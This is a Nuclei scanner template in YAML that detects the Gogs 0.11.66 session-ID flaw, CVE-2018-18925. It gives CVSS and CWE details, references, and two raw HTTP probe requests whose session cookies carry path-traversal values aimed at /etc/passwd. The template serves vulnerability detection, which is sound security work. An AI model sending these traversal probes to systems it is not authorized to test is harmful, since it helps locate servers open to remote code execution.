46 lines
1.7 KiB
YAML
46 lines
1.7 KiB
YAML
id: CVE-2018-18925
|
|
|
|
info:
|
|
name: Gogs (Go Git Service) 0.11.66 - Remote Code Execution
|
|
author: princechaddha
|
|
severity: critical
|
|
description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.
|
|
remediation: This issue will be fixed by updating to the latest version of Gogs.
|
|
reference:
|
|
- https://www.anquanke.com/post/id/163575
|
|
- https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925
|
|
- https://nvd.nist.gov/vuln/detail/cve-2018-18925
|
|
- https://github.com/gogs/gogs/issues/5469
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-18925
|
|
cwe-id: CWE-384
|
|
epss-score: 0.09538
|
|
epss-percentile: 0.94086
|
|
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: gogs
|
|
product: gogs
|
|
tags: gogs,lfi,rce,vulhub,cve,cve2018
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd;
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: lang=en-US; i_like_gogits=../../../../etc/dummy;
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")'
|
|
|
|
# digest: 490a00463044022051b0bf0ebf7d1423af71294b52d7f1234984d5ce919b80e3d33997ac7d0ba5c30220729e3c8d1d36983e297b38b4fb09f31e65be5a3c94ecb921b5eb1b5f9e853bfd:922c64590222798bb761d5b6d8e72950
|